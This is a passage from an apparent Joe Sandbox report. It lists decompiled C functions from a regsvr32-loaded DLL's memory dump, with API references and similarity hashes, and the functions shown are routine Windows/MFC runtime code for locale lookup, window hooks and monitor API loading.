                                                                        												 *(__ebp - 0x10) = __eax;
                                                                        												if(__eax == 0) {
                                                                        													goto L107;
                                                                        												}
                                                                        												L37:
                                                                        												_t159 = 0;
                                                                        												__eflags = 0;
                                                                        												goto L38;
                                                                        										}
                                                                        									}
                                                                        									_t54 =  &(_t184[1]);
                                                                        									 *_t54 = _t184[1] & _t146;
                                                                        									E10037A7E(7);
                                                                        									goto L37;
                                                                        								}
                                                                        								if(_t146 != _t184[2]) {
                                                                        									goto L24;
                                                                        								}
                                                                        								_t186 = _t184[1];
                                                                        								 *(_t206 + 0x10) = _t186;
                                                                        								E10037A7E(7);
                                                                        								if(_t186 == 0) {
                                                                        									goto L37;
                                                                        								}
                                                                        								if( *(_t206 + 8) < 0xc000) {
                                                                        									goto L28;
                                                                        								}
                                                                        								goto L105;
                                                                        							}
                                                                        							if( *(_t141 + 0x70) <= 0) {
                                                                        								goto L19;
                                                                        							}
                                                                        							if(_t179 < 0x200) {
                                                                        								L14:
                                                                        								if(_t179 < 0x100) {
                                                                        									L16:
                                                                        									if(_t179 < 0x281) {
                                                                        										goto L19;
                                                                        									}
                                                                        									if(_t179 > 0x291) {
                                                                        										goto L19;
                                                                        									}
                                                                        									L18:
                                                                        									_t167 =  *((intOrPtr*)( *( *(_t201 + 0x48)) + 0x94))(_t179,  *((intOrPtr*)(_t206 + 0xc)), _t204, _t206 - 0x10);
                                                                        									if(_t167 != 0) {
                                                                        										goto L107;
                                                                        									}
                                                                        									goto L19;
                                                                        								}
                                                                        								if(_t179 <= 0x10f) {
                                                                        									goto L18;
                                                                        								}
                                                                        								goto L16;
                                                                        							}
                                                                        							if(_t179 <= 0x209) {
                                                                        								goto L18;
                                                                        							}
                                                                        							goto L14;
                                                                        						} else {
                                                                        							_t171 = E10023401(_t201, _t204, _t204 >> 0x10);
                                                                        							if(_t171 != 0) {
                                                                        								L98:
                                                                        								 *(_t206 - 0x10) = 1;
                                                                        								L107:
                                                                        								_t157 =  *(_t206 + 0x14);
                                                                        								if(_t157 != 0) {
                                                                        									 *_t157 =  *(_t206 - 0x10);
                                                                        								}
                                                                        								_t159 = 1;
                                                                        								L38:
                                                                        								 *[fs:0x0] =  *((intOrPtr*)(_t206 - 0xc));
                                                                        								return _t159;
                                                                        							}
                                                                        							goto L10;
                                                                        						}
                                                                        					}
                                                                        					_t174 =  *(_t206 + 0x10);
                                                                        					if( *_t174 == 0) {
                                                                        						goto L37;
                                                                        					}
                                                                        					_push(_t206 - 0x10);
                                                                        					_push(_t174);
                                                                        					_push( *((intOrPtr*)(_t206 + 0xc)));
                                                                        					_t175 =  *((intOrPtr*)( *__ecx + 0xec))();
                                                                        					goto L100;
                                                                        				}
                                                                        				_push( *(_t206 + 0x10));
                                                                        				_push( *((intOrPtr*)(_t206 + 0xc)));
                                                                        				if( *((intOrPtr*)( *__ecx + 0xe8))() == 0) {
                                                                        					goto L37;
                                                                        				}
                                                                        				goto L98;
                                                                        			}

























                                                                        0x10023de8
                                                                        0x10023de8
                                                                        0x10023de9
                                                                        0x10023d03
                                                                        0x10023d03
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10023df2
                                                                        0x10023df5
                                                                        0x10023df8
                                                                        0x10023dfb
                                                                        0x10023dfc
                                                                        0x10023dfc
                                                                        0x10023dfd
                                                                        0x10023e00
                                                                        0x10023e00
                                                                        0x10023e02
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10023e17
                                                                        0x10023e1d
                                                                        0x10023e1e
                                                                        0x10023e1f
                                                                        0x10023e22
                                                                        0x10023e22
                                                                        0x10023e25
                                                                        0x10023e26
                                                                        0x10023e2a
                                                                        0x10023e2b
                                                                        0x10023e2d
                                                                        0x10023e2f
                                                                        0x10023e32
                                                                        0x10023e32
                                                                        0x10023e34
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10023e3b
                                                                        0x10023e3d
                                                                        0x10023e3f
                                                                        0x10023e41
                                                                        0x10023e44
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10023b5e
                                                                        0x10023b5e
                                                                        0x10023b5e
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10023b0b
                                                                        0x10023b54
                                                                        0x10023b54
                                                                        0x10023b59
                                                                        0x00000000
                                                                        0x10023b59
                                                                        0x10023a98
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10023a9a
                                                                        0x10023a9f
                                                                        0x10023aa2
                                                                        0x10023aa9
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10023ab6
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10023ab8
                                                                        0x10023a17
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10023a1f
                                                                        0x10023a29
                                                                        0x10023a2f
                                                                        0x10023a39
                                                                        0x10023a3f
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10023a47
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10023a49
                                                                        0x10023a57
                                                                        0x10023a5f
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10023a5f
                                                                        0x10023a37
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10023a37
                                                                        0x10023a27
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x100239f4
                                                                        0x100239ff
                                                                        0x10023a06
                                                                        0x10023e0e
                                                                        0x10023e0e
                                                                        0x10023e66
                                                                        0x10023e66
                                                                        0x10023e6b
                                                                        0x10023e70
                                                                        0x10023e70
                                                                        0x10023e74
                                                                        0x10023b60
                                                                        0x10023b66
                                                                        0x10023b6e
                                                                        0x10023b6e
                                                                        0x00000000
                                                                        0x10023a06
                                                                        0x100239f2
                                                                        0x100239b4
                                                                        0x100239ba
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x100239c5
                                                                        0x100239c6
                                                                        0x100239c7
                                                                        0x100239cc
                                                                        0x00000000
                                                                        0x100239cc
                                                                        0x10023994
                                                                        0x10023999
                                                                        0x100239a4
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: H_prolog
                                                                        • String ID:
                                                                        • API String ID: 3519838083-0
                                                                        • Opcode ID: d40d6d6e6cef6803208f6e3609c2f1027a444feec77636e89629d5b53b439ef5
                                                                        • Instruction ID: 1e1e474db0047197a83ae3098e3256374823658fb0d5be61515164714213afbe
                                                                        • Opcode Fuzzy Hash: d40d6d6e6cef6803208f6e3609c2f1027a444feec77636e89629d5b53b439ef5
                                                                        • Instruction Fuzzy Hash: 52E19C74600209EFDF25CF58EC81AAE7BA9EF04750FA1C515F819EB292C735EA10DB61
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E1001A444(void* __ebx, int _a4) {
                                                                        				intOrPtr _v8;
                                                                        				char _v10;
                                                                        				char _v16;
                                                                        				void* __ebp;
                                                                        				intOrPtr _t7;
                                                                        				signed int _t9;
                                                                        				signed int _t11;
                                                                        				void* _t14;
                                                                        				void* _t17;
                                                                        
                                                                        				_t7 =  *0x1004c470; // 0x303bb91f
                                                                        				_v8 = _t7;
                                                                        				_v10 = 0;
                                                                        				_t9 = GetLocaleInfoA(_a4, 0x1004,  &_v16, 6);
                                                                        				if(_t9 != 0) {
                                                                        					_t11 = E10012749(__ebx, _t14, _t17,  &_v16);
                                                                        				} else {
                                                                        					_t11 = _t9 | 0xffffffff;
                                                                        				}
                                                                        				return E100117AE(_t11, _v8);
                                                                        			}


                                                                        APIs
                                                                        • GetLocaleInfoA.KERNEL32(?,00001004,00000100,00000006,00000100,?,00000000), ref: 1001A464
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: InfoLocale
                                                                        • String ID:
                                                                        • API String ID: 2299586839-0
                                                                        • Opcode ID: 05a0c33dc4fe3510d994e67f2a9bcf377461d58a3556d082f56ba058f11004d6
                                                                        • Instruction ID: 3c73900817429885cf4f72f3856ece86c9a81f663f4ecb35863165dbab89a4dc
                                                                        • Opcode Fuzzy Hash: 05a0c33dc4fe3510d994e67f2a9bcf377461d58a3556d082f56ba058f11004d6
                                                                        • Instruction Fuzzy Hash: 66E09235A04248ABDB00DBF4D946E8D77F8AB45314F004155E550DB1D0DBB1E6848754
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 84%
                                                                        			E10034959(void* __ebx, void* __edi, void* __esi, intOrPtr _a4) {
                                                                        				intOrPtr _v8;
                                                                        				char _v24;
                                                                        				void* _v28;
                                                                        				void* _v32;
                                                                        				int _v36;
                                                                        				int _v40;
                                                                        				signed short _v44;
                                                                        				int _v52;
                                                                        				int _v56;
                                                                        				int _v60;
                                                                        				int _v64;
                                                                        				intOrPtr _t42;
                                                                        				struct HINSTANCE__* _t43;
                                                                        				_Unknown_base(*)()* _t44;
                                                                        				struct HINSTANCE__* _t46;
                                                                        				void* _t47;
                                                                        				signed int _t50;
                                                                        				signed short _t65;
                                                                        				signed int _t66;
                                                                        				int _t70;
                                                                        				signed short _t71;
                                                                        				signed int _t72;
                                                                        				signed short _t78;
                                                                        				signed int _t79;
                                                                        				char* _t85;
                                                                        				int _t87;
                                                                        				signed int _t95;
                                                                        				signed int _t99;
                                                                        				int _t100;
                                                                        				int _t101;
                                                                        				void* _t105;
                                                                        				void* _t109;
                                                                        
                                                                        				_t42 =  *0x1004c470; // 0x303bb91f
                                                                        				_t85 = 0;
                                                                        				_v8 = _t42;
                                                                        				_v28 = 0;
                                                                        				_t43 = GetModuleHandleA("kernel32.dll");
                                                                        				_v36 = _t43;
                                                                        				_t44 = GetProcAddress(_t43, "GetUserDefaultUILanguage");
                                                                        				if(_t44 == 0) {
                                                                        					if(GetVersion() >= 0) {
                                                                        						_t46 = GetModuleHandleA("ntdll.dll");
                                                                        						if(_t46 == 0) {
                                                                        							L13:
                                                                        							 *((intOrPtr*)(_t109 + 0xffffffffffffffc4)) = 0x800;
                                                                        							_t105 = 1;
                                                                        							_t99 = 0;
                                                                        							if(1 <= _t85) {
                                                                        								L16:
                                                                        								_t47 = 0;
                                                                        								L17:
                                                                        								return E100117AE(_t47, _v8);
                                                                        							} else {
                                                                        								goto L14;
                                                                        							}
                                                                        							while(1) {
                                                                        								L14:
                                                                        								_t47 = E100348C4(_t85, _t88, _t105, _a4,  *((intOrPtr*)(_t109 + _t99 * 4 - 0x3c)));
                                                                        								_pop(_t88);
                                                                        								if(_t47 != _t85) {
                                                                        									goto L17;
                                                                        								}
                                                                        								_t99 =  &(1[_t99]);
                                                                        								if(_t99 < _t105) {
                                                                        									continue;
                                                                        								}
                                                                        								goto L16;
                                                                        							}
                                                                        							goto L17;
                                                                        						}
                                                                        						_t88 =  &_v28;
                                                                        						_v28 = 0;
                                                                        						EnumResourceLanguagesA(_t46, 0x10, 1, 0x10034943,  &_v28);
                                                                        						if(_v28 == 0) {
                                                                        							goto L13;
                                                                        						}
                                                                        						_t50 = _v28 & 0x0000ffff;
                                                                        						_t88 = _t50 & 0x000003ff;
                                                                        						_t100 = _t50 & 0x3ff;
                                                                        						_v64 = ConvertDefaultLocale(_t50 & 0x0000fc00 | _t100);
                                                                        						_v60 = ConvertDefaultLocale(_t100);
                                                                        						_push(2);
                                                                        						L12:
                                                                        						_pop(0);
                                                                        						goto L13;
                                                                        					}
                                                                        					_v32 = 0;
                                                                        					if(RegOpenKeyExA(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x20019,  &_v32) == 0) {
                                                                        						_v36 = 0x10;
                                                                        						if(RegQueryValueExA(_v32, 0, 0,  &_v40,  &_v24,  &_v36) == 0 && _v40 == 1 && E10011D9B(0, GetModuleHandleA, 0,  &_v24, "%x",  &_v44) == 1) {
                                                                        							_t65 = _v44;
                                                                        							_v28 = _t65;
                                                                        							_t66 = _t65 & 0x0000ffff;
                                                                        							_t88 = _t66 & 0x000003ff;
                                                                        							_t101 = _t66 & 0x3ff;
                                                                        							_v64 = ConvertDefaultLocale(_t66 & 0x0000fc00 | _t101);
                                                                        							_t70 = ConvertDefaultLocale(_t101);
                                                                        							_push(2);
                                                                        							_v60 = _t70;
                                                                        							_pop(0);
                                                                        						}
                                                                        						RegCloseKey(_v32);
                                                                        					}
                                                                        					goto L13;
                                                                        				}
                                                                        				_t71 =  *_t44();
                                                                        				_v28 = _t71;
                                                                        				_t72 = _t71 & 0x0000ffff;
                                                                        				_t95 = _t72 & 0x3ff;
                                                                        				_v32 = _t95;
                                                                        				_v64 = ConvertDefaultLocale(_t72 & 0x0000fc00 | _t95);
                                                                        				_v60 = ConvertDefaultLocale(_v32);
                                                                        				_t78 =  *(GetProcAddress(_v36, "GetSystemDefaultUILanguage"))();
                                                                        				_v28 = _t78;
                                                                        				_t79 = _t78 & 0x0000ffff;
                                                                        				_t88 = _t79 & 0x000003ff;
                                                                        				_t87 = _t79 & 0x3ff;
                                                                        				_v56 = ConvertDefaultLocale(_t79 & 0x0000fc00 | _t87);
                                                                        				_v52 = ConvertDefaultLocale(_t87);
                                                                        				_push(4);
                                                                        				_t85 = 0;
                                                                        				goto L12;
                                                                        			}




































                                                                        APIs
                                                                        • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 1003497C
                                                                        • GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 10034987
                                                                        • ConvertDefaultLocale.KERNEL32(?), ref: 100349B8
                                                                        • ConvertDefaultLocale.KERNEL32(?), ref: 100349C0
                                                                        • GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 100349CD
                                                                        • ConvertDefaultLocale.KERNEL32(?), ref: 100349E7
                                                                        • ConvertDefaultLocale.KERNEL32(000003FF), ref: 100349ED
                                                                        • GetVersion.KERNEL32 ref: 100349FB
                                                                        • RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 10034A20
                                                                        • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,?,?), ref: 10034A46
                                                                        • ConvertDefaultLocale.KERNEL32(?), ref: 10034A92
                                                                        • ConvertDefaultLocale.KERNEL32(76D84DE0), ref: 10034A98
                                                                        • RegCloseKey.ADVAPI32(?), ref: 10034AA3
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: ConvertDefaultLocale$AddressProc$CloseHandleModuleOpenQueryValueVersion
                                                                        • String ID: Control Panel\Desktop\ResourceLocale$GetSystemDefaultUILanguage$GetUserDefaultUILanguage$kernel32.dll$ntdll.dll
                                                                        • API String ID: 780041395-483790700
                                                                        • Opcode ID: b751cc2896b4dc922988b93c4690cf324e453cc8dd7871bdd23ac9d4d6c5d43c
                                                                        • Instruction ID: 7cfe531e2014ce0a7197dcc2f573d90a24e44201c953dd79459b2257b218328e
                                                                        • Opcode Fuzzy Hash: b751cc2896b4dc922988b93c4690cf324e453cc8dd7871bdd23ac9d4d6c5d43c
                                                                        • Instruction Fuzzy Hash: 00515F75D0022DAFDB12DFE6DC85AEFBBF8EB48355F11442AE501EB140DB7899409BA0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 96%
                                                                        			E100235CF(void* __ebx, void* __edi, void* __esi, int _a4, int _a8, long _a12) {
                                                                        				intOrPtr _v8;
                                                                        				char _v16;
                                                                        				char _v17;
                                                                        				char _v272;
                                                                        				struct _WNDCLASSEXA _v320;
                                                                        				void* __ebp;
                                                                        				intOrPtr _t52;
                                                                        				signed int _t56;
                                                                        				char _t58;
                                                                        				long _t60;
                                                                        				int _t71;
                                                                        				long _t81;
                                                                        				CHAR* _t83;
                                                                        				void* _t90;
                                                                        				void* _t99;
                                                                        				long* _t102;
                                                                        				signed int _t104;
                                                                        				long _t105;
                                                                        				CHAR* _t107;
                                                                        				int _t108;
                                                                        
                                                                        				_t52 =  *0x1004c470; // 0x303bb91f
                                                                        				_push(0x100347fd);
                                                                        				_v8 = _t52;
                                                                        				_t90 = E10037855(0x1004efe8);
                                                                        				if(_a4 == 3) {
                                                                        					_t104 =  *(_t90 + 0x14);
                                                                        					_push(__edi);
                                                                        					_t99 =  *_a12;
                                                                        					_t56 =  *(E100373B5() + 0x14) & 0x000000ff;
                                                                        					_a4 = _t56;
                                                                        					if(_t104 != 0 || ( *(_t99 + 0x23) & 0x00000040) == 0 && _t56 == 0) {
                                                                        						if( *0x1004f354 == 0) {
                                                                        							L10:
                                                                        							if(_t104 == 0) {
                                                                        								if( *0x1004ef68 != 0) {
                                                                        									L16:
                                                                        									if(GetClassLongA(_a8, 0xffffffe0) !=  *0x1004ef68) {
                                                                        										L20:
                                                                        										_t58 = GetWindowLongA(_a8, 0xfffffffc);
                                                                        										_v16 = _t58;
                                                                        										if(_t58 != 0) {
                                                                        											_t107 = "AfxOldWndProc423";
                                                                        											if(GetPropA(_a8, _t107) == 0) {
                                                                        												SetPropA(_a8, _t107, _v16);
                                                                        												if(GetPropA(_a8, _t107) == _v16) {
                                                                        													GlobalAddAtomA(_t107);
                                                                        													SetWindowLongA(_a8, 0xfffffffc, 0x10023477);
                                                                        												}
                                                                        											}
                                                                        										}
                                                                        										goto L24;
                                                                        									}
                                                                        									goto L24;
                                                                        								}
                                                                        								_t108 = 0x30;
                                                                        								E10011C50( &_v320, 0, _t108);
                                                                        								_v320.cbSize = _t108;
                                                                        								_t71 = GetClassInfoExA(0, "#32768",  &_v320);
                                                                        								 *0x1004ef68 = _t71;
                                                                        								if(_t71 == 0) {
                                                                        									if(GetClassNameA(_a8,  &_v272, 0x100) == 0) {
                                                                        										goto L20;
                                                                        									}
                                                                        									_v17 = 0;
                                                                        									if(E10011CB0(_t90, _t99,  &_v272, "#32768") == 0) {
                                                                        										goto L24;
                                                                        									}
                                                                        									goto L20;
                                                                        								}
                                                                        								goto L16;
                                                                        							}
                                                                        							E1002212F(_t104, _a8);
                                                                        							 *((intOrPtr*)( *_t104 + 0x50))();
                                                                        							_t102 =  *((intOrPtr*)( *_t104 + 0xf0))();
                                                                        							_t81 = SetWindowLongA(_a8, 0xfffffffc, E1002292C);
                                                                        							if(_t81 != E1002292C) {
                                                                        								 *_t102 = _t81;
                                                                        							}
                                                                        							 *(_t90 + 0x14) =  *(_t90 + 0x14) & 0x00000000;
                                                                        							goto L24;
                                                                        						}
                                                                        						if((GetClassLongA(_a8, 0xffffffe6) & 0x00010000) != 0) {
                                                                        							goto L24;
                                                                        						}
                                                                        						_t83 =  *(_t99 + 0x28);
                                                                        						if(_t83 <= 0xffff) {
                                                                        							_v16 = 0;
                                                                        							GlobalGetAtomNameA(0,  &_v16, 5);
                                                                        							_t83 =  &_v16;
                                                                        						}
                                                                        						if(lstrcmpiA(_t83, "ime") == 0) {
                                                                        							goto L24;
                                                                        						}
                                                                        						goto L10;
                                                                        					} else {
                                                                        						L24:
                                                                        						_t105 = CallNextHookEx( *(_t90 + 0x28), 3, _a8, _a12);
                                                                        						if(_a4 != 0) {
                                                                        							UnhookWindowsHookEx( *(_t90 + 0x28));
                                                                        							 *(_t90 + 0x28) =  *(_t90 + 0x28) & 0x00000000;
                                                                        						}
                                                                        						_t60 = _t105;
                                                                        						goto L27;
                                                                        					}
                                                                        				} else {
                                                                        					_t60 = CallNextHookEx( *(_t90 + 0x28), _a4, _a8, _a12);
                                                                        					L27:
                                                                        					return E100117AE(_t60, _v8);
                                                                        				}
                                                                        			}
























                                                                        APIs
                                                                          • Part of subcall function 10037855: __EH_prolog.LIBCMT ref: 1003785A
                                                                        • CallNextHookEx.USER32 ref: 10023604
                                                                        • GetClassLongA.USER32 ref: 10023649
                                                                        • GlobalGetAtomNameA.KERNEL32 ref: 10023675
                                                                        • lstrcmpiA.KERNEL32(?,ime,?,?,100347FD), ref: 10023684
                                                                        • SetWindowLongA.USER32(?,000000FC,Function_0002292C), ref: 100236BE
                                                                        • CallNextHookEx.USER32 ref: 100237C2
                                                                        • UnhookWindowsHookEx.USER32(?), ref: 100237D3
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: Hook$CallLongNext$AtomClassGlobalH_prologNameUnhookWindowWindowslstrcmpi
                                                                        • String ID: #32768$AfxOldWndProc423$ime
                                                                        • API String ID: 3204395069-4034971020
                                                                        • Opcode ID: 60e81f5e3488c30badae242d963b3e25ed67a4f765a4769238edff23d7bb639b
                                                                        • Instruction ID: 9db2fd6ca1a0fe5cf1724ce820e3dc2bd2b139ec8c0118dd51308d1b35c9be8a
                                                                        • Opcode Fuzzy Hash: 60e81f5e3488c30badae242d963b3e25ed67a4f765a4769238edff23d7bb639b
                                                                        • Instruction Fuzzy Hash: 1051AB75504269BFDF12DF61EC88FAA7BB9EF053A0F618164F814EA1A1C730DA44CB90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 97%
                                                                        			E1000799F() {
                                                                        				void* __edi;
                                                                        				intOrPtr _t5;
                                                                        				_Unknown_base(*)()* _t6;
                                                                        				_Unknown_base(*)()* _t7;
                                                                        				_Unknown_base(*)()* _t8;
                                                                        				_Unknown_base(*)()* _t9;
                                                                        				_Unknown_base(*)()* _t10;
                                                                        				_Unknown_base(*)()* _t11;
                                                                        				_Unknown_base(*)()* _t12;
                                                                        				void* _t17;
                                                                        				struct HINSTANCE__* _t18;
                                                                        				intOrPtr _t23;
                                                                        				_Unknown_base(*)()* _t24;
                                                                        
                                                                        				_t23 =  *0x1004ee14; // 0x0
                                                                        				if(_t23 == 0) {
                                                                        					_push(_t17);
                                                                        					 *0x1004ee18 = E10007952(_t17);
                                                                        					_t18 = GetModuleHandleA("USER32");
                                                                        					if(_t18 == 0) {
                                                                        						L11:
                                                                        						 *0x1004edf8 = 0;
                                                                        						 *0x1004edfc = 0;
                                                                        						 *0x1004ee00 = 0;
                                                                        						 *0x1004ee04 = 0;
                                                                        						 *0x1004ee08 = 0;
                                                                        						 *0x1004ee0c = 0;
                                                                        						 *0x1004ee10 = 0;
                                                                        						 *0x1004ee14 = 1;
                                                                        						_t5 = 0;
                                                                        					} else {
                                                                        						_t6 = GetProcAddress(_t18, "GetSystemMetrics");
                                                                        						 *0x1004edf8 = _t6;
                                                                        						if(_t6 == 0) {
                                                                        							goto L11;
                                                                        						} else {
                                                                        							_t7 = GetProcAddress(_t18, "MonitorFromWindow");
                                                                        							 *0x1004edfc = _t7;
                                                                        							if(_t7 == 0) {
                                                                        								goto L11;
                                                                        							} else {
                                                                        								_t8 = GetProcAddress(_t18, "MonitorFromRect");
                                                                        								 *0x1004ee00 = _t8;
                                                                        								if(_t8 == 0) {
                                                                        									goto L11;
                                                                        								} else {
                                                                        									_t9 = GetProcAddress(_t18, "MonitorFromPoint");
                                                                        									 *0x1004ee04 = _t9;
                                                                        									if(_t9 == 0) {
                                                                        										goto L11;
                                                                        									} else {
                                                                        										_t10 = GetProcAddress(_t18, "EnumDisplayMonitors");
                                                                        										 *0x1004ee0c = _t10;
                                                                        										if(_t10 == 0) {
                                                                        											goto L11;
                                                                        										} else {
                                                                        											_t11 = GetProcAddress(_t18, "GetMonitorInfoA");
                                                                        											 *0x1004ee08 = _t11;
                                                                        											if(_t11 == 0) {
                                                                        												goto L11;
                                                                        											} else {
                                                                        												_t12 = GetProcAddress(_t18, "EnumDisplayDevicesA");
                                                                        												 *0x1004ee10 = _t12;
                                                                        												if(_t12 == 0) {
                                                                        													goto L11;
                                                                        												} else {
                                                                        													_t5 = 1;
                                                                        													 *0x1004ee14 = 1;
                                                                        												}
                                                                        											}
                                                                        										}
                                                                        									}
                                                                        								}
                                                                        							}
                                                                        						}
                                                                        					}
                                                                        					return _t5;
                                                                        				} else {
                                                                        					_t24 =  *0x1004ee08; // 0x0
                                                                        					return 0 | _t24 != 0x00000000;
                                                                        				}
                                                                        			}

















                                                                        APIs
                                                                        • GetModuleHandleA.KERNEL32(USER32,?,?,?,10007AF0), ref: 100079C8
                                                                        • GetProcAddress.KERNEL32(00000000,GetSystemMetrics), ref: 100079E4
                                                                        • GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 100079F5
                                                                        • GetProcAddress.KERNEL32(00000000,MonitorFromRect), ref: 10007A06
                                                                        • GetProcAddress.KERNEL32(00000000,MonitorFromPoint), ref: 10007A17
                                                                        • GetProcAddress.KERNEL32(00000000,EnumDisplayMonitors), ref: 10007A28
                                                                        • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 10007A39
                                                                        • GetProcAddress.KERNEL32(00000000,EnumDisplayDevicesA), ref: 10007A4A
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: AddressProc$HandleModule
                                                                        • String ID: EnumDisplayDevicesA$EnumDisplayMonitors$GetMonitorInfoA$GetSystemMetrics$MonitorFromPoint$MonitorFromRect$MonitorFromWindow$USER32
                                                                        • API String ID: 667068680-68207542
                                                                        • Opcode ID: c432c94375e8382fa0d09503a03fb3d1310a5af8d0fbbc4bfd570d7384b4b05a
                                                                        • Instruction ID: ffa68e8141f0c788966a5bf5f1ab221f1da63df34d474a4f7eb5d2f911dd9ebc
                                                                        • Opcode Fuzzy Hash: c432c94375e8382fa0d09503a03fb3d1310a5af8d0fbbc4bfd570d7384b4b05a
                                                                        • Instruction Fuzzy Hash: 05214F71E055B19EF702EF678EC482EBAE5F38B381351483FD109D6125C7B44D518B9A
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 84%
                                                                        			E10024FBB(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, signed int _a4) {
                                                                        				signed int _v8;
                                                                        				intOrPtr _v16;
                                                                        				intOrPtr _v20;
                                                                        				char _v32;
                                                                        				char _v268;
                                                                        				char _v292;
                                                                        				char _v296;
                                                                        				signed int _v300;
                                                                        				CHAR* _v304;
                                                                        				intOrPtr _v308;
                                                                        				char _v312;
